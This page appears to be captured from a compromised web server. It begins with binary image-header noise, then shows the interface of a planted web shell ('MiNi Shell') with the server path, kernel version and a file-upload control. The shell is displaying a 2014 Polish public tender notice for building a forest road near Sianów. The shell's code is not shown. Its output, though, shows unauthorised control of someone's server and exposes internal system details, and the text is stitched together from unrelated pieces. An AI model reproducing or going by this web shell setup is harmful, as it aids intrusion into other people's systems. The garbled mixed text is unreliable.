JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140909/298976-N-2014.html

<p class="kh_header"><b>Sianów: Budowa drogi leśnej Nr 51 o nawierzchni twardej ulepszonej (płyty betonowe typu JOMB) w leśnictwie Sieciemin, o długości 2,530 km - I etap.
Nr sprawy 2710-02/14</b><br>
<b>Numer ogłoszenia: 298976 - 2014; data zamieszczenia: 09.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Karnieszewice , Trawica 8A, 76-004 Sianów, tel. 094 3185227, 3185228.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jed.org.nieposiadająca osobowości prawnej zarządzająca mieniem skarbu państwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa drogi leśnej Nr 51 o nawierzchni twardej ulepszonej (płyty betonowe typu JOMB) w leśnictwie Sieciemin, o długości 2,530 km - I etap.
Nr sprawy 2710-02/14.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są roboty budowlane (drogowe):
Budowa drogi leśnej Nr 51 o nawierzchni twardej ulepszonej (płyty betonowe typu JOMB) w leśnictwie Sieciemin, o długości 2,530 km - I etap, a także wykonanie usług innych czynności, niezbędnych do wykonania budowy drogi.
Wykonawca winien wykonać roboty budowlane i przekazać zamawiającemu dokumentację powykonawczą w sposób umożliwiający Inwestorowi złożenie zawiadomienia właściwego organu nadzoru budowlanego o zakończeniu budowy.

Droga leśna przebiega przez grunty będące w zarządzie Lasów Państwowych - Nadleśnictwo Karnieszewice. Trasa drogi nie narusza stanu prawnego osób trzech. 
I. STAN  ISTNIEJĄCY 
Projektowana droga leśna posiada zróżnicowany stan techniczny. Szerokość drogi zróżnicowana. Od km 1+330,45 na długości ca 400 m gęste zadrzewienie wzdłuż drogi.  
Odwodnienie powierzchniowe przydrożnymi rowami, zamulonymi i zarośniętymi. Występują koleiny i wyboje. W celu poprawy odwodnienia wykonywano rowki odprowadzające wodę z wybojów. 
Grunt piaszczysty z domieszką części organicznych.
Teren przeznaczony pod mijanki porośnięty trawami, drzewami, występują karcze.  
II. STAN  PROJEKTOWANY 
 Na podstawie wytycznych technicznych dla dróg leśnych oraz zapisów zwartych 
w opisie przedmiotu zamówienia dla budowanej drogi ustalono następujące parametry techniczne:
- prędkość projektowa 30 km/h;
- szerokość jezdni -3,60 m ( w tym jezdni z płyt  3,0 m i opaski zewnętrzne z KŁSM po 0,30m);
- szerokość mijanek - 2,50 m od opaski zewnętrznej;
- szerokość poboczy - 0,50 m;
- spadek poprzeczny jezdni z płyt drogowych - 2%;
- spadek poprzeczny jezdni z kruszywa - 3%;
- spadek poprzeczny mijanek - 3%;
- spadek poprzeczny poboczy - 6%;
1.  PROJEKTOWANA KONSTRUKCJA 
-  jezdni  z płyt drogowych wielootworowych typu JOMB
- 12,5 cm - płyty drogowe wielootworowe 75x100x12,5 układane dwuśladowo wg przekroju normalnego
- 15 cm - podbudowa z kruszywa naturalnego stabilizowanego mechaniczne o frakcji 0/31,5 (mieszanka optymalna)
- 10 cm - warstwa odcinająca
Uwaga: poszerzenie jezdni z płyt (opaski zewnętrzne) o szerokości 0,30 m należy wykonać z kruszywa łamanego stabilizowanego mechanicznie o frakcji 0/31,5 (KŁSM)
Uwaga: wypełnienie przestrzeni między płytami o szerokości 1,0m należy wykonać materiałem będącym kruszywem łamanym stabilizowanym mechanicznie o frakcji 0/31,5 (materiał taki sam jak na nawierzchnię jezdni skrzyżowań i mijanek) 
-  jezdni dróg bocznych z kruszywa łamanego (skrzyżowania)
- 12,5 cm - nawierzchnia z kruszywa łamanego stabilizowanego mechanicznie 
o frakcji 0/31,5 z zawartością kruszyw łamanych nie mniej niż 75%
- 15 cm - podbudowa z kruszywa naturalnego stabilizowanego mechaniczne o frakcji 0/31,5 (mieszanka optymalna)
-  mijanek z kruszywa łamanego (KŁSM)
- 12,5 cm - nawierzchnia z kruszywa łamanego stabilizowanego mechanicznie 
o frakcji 0/31,5 z zawartością kruszyw łamanych nie mniej niż 75%
- 15 cm - podbudowa z kruszywa naturalnego stabilizowanego mechaniczne o frakcji 0/31,5 (mieszanka optymalna)
- 10 cm - warstwa odcinająca
Projektowaną konstrukcję przedstawiono w Przekrojach normalnych - rys. nr 3 PB
Zaprojektowano 7 mijanek w lokalizacji przedstawionej na planie sytuacyjnym i w zestawieniu stanowiącym załącznik. Parametry techniczne mijanek przedstawiono na rysunku nr 5. 
Grunt z wykopów można wykorzystać do wykonania nasypów i poboczy gruntowych. Nieprzydatny, zanieczyszczony częściami organicznymi, należy wywieźć w miejsce wskazane przez Inwestora. 
Zakres robót związany z przygotowaniem podłoża pod konstrukcję drogi należy poprzedzić profilowaniem w celu zlikwidowania głębokich wybojów, muld porośniętych trawami oraz usunięcia błota.
Do wyrównania podłoża w miejscu występowania głębokich kolein lub wybojów zaprojektowano użycie gruzu z betonu żwirowego.  
W ramach robót przygotowawczych należy usunąć wszystkie karcze znajdujące się 
w pasie robót drogowych, a doły zasypać gruntem pochodzącym z wykopów robót ziemnych. 
Rowy przydrożne są rowami odparowującymi (rozsączającymi) o głębokości do 0,50 m od rzędnej niwelety i szerokości dna 0,40 m. Dno rowu należy wyprofilować nadając spadek zgodny z niweletą. Skarpy rowu po wykonaniu robót ziemnych należy wyprofilować.
2.  PROJEKTOWANA TRASA W  PLANIE
Drogę leśną na całej długości pomierzono geodezyjnie i wykonano mapę w skali 1:500. Na podstawie pomiaru geodezyjnego zaprojektowano przebieg drogi w planie na długości 2530 mb.
Przebieg drogi w planie podzielono na 2 odcinki:
- odcinek 1 - w km 0+000 - 1+326,00 (do drogi powiatowej nr 3716Z Niemica-Bartolino o nawierzchni bitumicznej), 
- odcinek 2 - w km 1+330,45 - 2+530,00 (od drogi powiatowej nr 3716Z Niemica-Bartolino)
Załamania trasy wyokrąglono łukami poziomymi. 
Przebieg trasy przedstawiono na Planie sytuacyjnym rys. nr 1.
3.  PRZEKRÓJ  POPRZECZNY
Na całym odcinku projektowanej drogi leśnej zaprojektowano spadek poprzeczny wynoszący 2% na nawierzchni z płyt i 3% na nawierzchni z kruszywa.
Z uwagi na ukształtowanie terenu zaprojektowano następujące przekroje poprzeczne:
- odcinek 1 - spadek daszkowy 2% na całym odcinku drogi
- odcinek 2 - w km 1+330,45 - 2+114,00 spadek daszkowy 2%
                   w  km 2+114,00 - 2+530,00 spadek jednostronny 2% prawy
Z uwagi na odcinkowy przebieg drogi (strona lewa strome wzniesienie, strona prawa wyraźnie opadająca skarpa w kierunku rzeki) od km 2+271,80 zaprojektowano faszynę za ściekiem z brukowca. Przyjęto ogólnie stosowaną faszynę fi 20 w układzie kołki 4-6 cm 3 szt./m i szpilki 3-5 cm co 50 cm. 
Spadek poprzeczny mijanek wynosi 3% w kierunku od jezdni. Szerokość mijanki 2,50 m wraz z opaską jezdni z kruszywa łamanego szerokość nawierzchni z kruszywa wynosi 2,80m.
Pobocza gruntowe o szerokości 0,50 m należy wyprofilować (plantować) ze spadkiem 6%.  
Parametry techniczne mijanek przedstawiono na rys. nr 5.
4.  PROFIL PODŁUŻNY
Zaprojektowana niweleta drogi nawiązuje do stanu istniejącego. Spełnia wymagania normowe.
W celu poprawy warunków przejezdności dokonano korekty profilu podłużnego likwidując lokalne zaniżenia i załamania. 
Profil podłużny rys. nr 2.
5.  ODWODNIENIE
Odwodnienie powierzchniowe. Z uwagi na występujący w podłożu grunt piaszczysty rowy przydrożne pełnią funkcję rowów odparowujących i rozsączających wody opadowe i roztopowe. 
Zaprojektowano następujący układ rowów, ścieków i brodów:
 - rowy - przedstawiono na Planie sytuacyjnym
 - ścieki - w km 2+114,00 - 2+265,80 L ściek bez faszyny, 
               w km 2+271,80 - 2+530,00 L ściek z faszyną                
 - brody - w km 2+268,80, 
                w km 2+528,50

2. Lokalizacja inwestycji:
Leśnictwo Sieciemin - działki 432, 431/1, 430/1, 204, 428, 427/1 i 99 w obrębie ewidencyjnym Kusice, gmina Malechowo.

3. Szczegółowy opis przedmiotu zamówienia określony został w: 

a) dokumentacji projektowej (projekt budowlany wykonawczy)
b) Specyfikacjach Technicznych Wykonania i Odbioru Robót
c) przedmiarze robót 

4. Dokumenty, o których mowa w punkcie 3. a), b), c) stanowią załącznik do SIWZ. 

5. Przedmiar robót stanowi element pomocniczy przy wycenie; w ofercie Wykonawca określa wynagrodzenie ryczałtowe za wykonanie robót opisanych w Projekcie budowlanym i załączonych Specyfikacjach Technicznych Wykonania i Odbioru Robót.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających,
o których mowa w art. 67 ust. 1 pkt 6. Zamówienia uzupełniające dotyczą powtórzenia robót objętych zamówieniem podstawowym tego samego rodzaju zamówień 
o wartości do 50% zamówienia podstawowego (roboty dotyczące budowy drogi leśnej Nr 51 o nawierzchni twardej ulepszonej - płyty betonowe typu JOMB w leśnictwie Sieciemin.
2. Zamawiający przewiduje możliwość udzielenia zamówień dodatkowych, jeśli spełnione zostaną przesłanki udzielenia takiego zamówienia, określone w art. 67 ust.1 pkt 5 ustawy Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.23-7, 45.23.32.26-9, 45.11.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 25.000,00 złotych (słownie: dwadzieścia pięć tysięcy 00/100 złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu dotyczących posiadania uprawnień do wykonywania określonej działalności. Wykonawca w tym zakresie złoży oświadczenie o spełnieniu warunków udziału           w postępowaniu. 
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże że w okresie ostatnich 5 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej trzy zamówienia (zadania) polegające na budowie lub przebudowie dróg o nawierzchni      z płyt żelbetowych oraz tłuczniowej o wartości każdego zamówienia (zadania) co najmniej 300.000,00 zł netto (słownie: trzysta tysięcy 00/100 złotych)
-  Wykonawca w tym zakresie złoży oświadczenie o spełnianiu warunków udziału        w postępowaniu oraz dokumenty wskazane p. XI specyfikacji. 
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli wykaże, że na czas realizacji zamówienia będzie dysponował sprzętem mechanicznym: samochód samowyładowczy (min. 1 szt.) o ładowności powyżej 5,0 ton (wskazane około 12 ton), koparko-ładowarką lub koparką (min. 1 szt.), równiarką drogową samojezdną (min. 1 szt.) lub/i spycharką (min. 1 szt.) oraz walcem drogowym (min. 1 szt.); 
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli wykaże, że na czas realizacji zamówienia będzie dysponował osobą posiadającą uprawnienia do kierowania robotami budowlanymi drogowymi, aktualny wpis do właściwej izby inżynierskiej i ubezpieczenie odpowiedzialności cywilnej    
Wykonawca w tym zakresie złoży oświadczenie o spełnieniu warunków udziału           w postępowaniu oraz wykaz osób odpowiedzialnych za kierowanie robotami.
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli:
- wykaże posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem niniejszego zamówienia (roboty budowlane - drogowe), przy czym kwota tego ubezpieczenia nie może być mniejsza niż 800.000,00 złotych
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w następujących zakresach:
1. Zamawiający przewiduje możliwość zmiany ceny ofertowej:
a) w przypadku ustawowej zmiany stawki podatku VAT w czasie realizacji zamówienia, o wielkość tej stawki,
b) w przypadku rezygnacji z części zamówienia wynikającej z zaistnienia okoliczności powodującej, że wykonanie jej nie leży w interesie publicznym,
2. Zamawiający przewiduje możliwość zmiany terminu wykonania zamówienia:
a) przypadku udzielenia Wykonawcy zamówienia dodatkowego lub uzupełniającego w oparciu o art. 67 ust. 1 ustawy PZP, jeśli jego wykonanie (sposób, technologia) będzie skutkowało wydłużeniem terminu wykonania zamówienia podstawowego; 
b) w przypadku wstrzymania robót budowlanych w wyniku działania siły wyższej, potwierdzonego wpisem do dziennika budowy przez inspektora nadzoru, o ile czas wstrzymania robót i ich zakres będzie skutkować wydłużeniem terminu wykonania zamówienia
c) jeżeli w czasie obowiązywania umowy wystąpią wybitnie niesprzyjające warunki pogodowe uniemożliwiające realizację zadania np.: długotrwałe opady atmosferyczne, 
d) przypadku zaistnienia okoliczności niezależnych od Wykonawcy                   a w szczególności w przypadku istotnych błędów w dokumentacji projektowej, kolizji z niezinwentaryzowanymi sieciami podziemnymi, konieczności prowadzenia prac wykopaliskowych itp.
3. W przypadku powyższych okoliczności może nastąpić zmiana terminu zakończenia robót lub wynagrodzenia należnego Wykonawcy. 
4. Nowy termin wykonania zamówienia ustali Zamawiający po negocjacjach     z Wykonawcą.
5. Zamawiający w razie wstrzymania robót z przyczyn, za które wykonawca nie odpowiada, obowiązany jest do:
a) dokonania odbioru robót przerwanych oraz do zapłaty wynagrodzenia za roboty, które zostały wykonane do dnia odstąpienia,
b) przejęcie od Wykonawcy terenu budowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_szczecinek/nadl_karnieszewice/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Karnieszewice,
Trawica 8A,
76-004 Sianów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2014 godzina 10:00, miejsce: Nadleśnictwo Karnieszewice,
Trawica 8A,
76-004 Sianów,
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com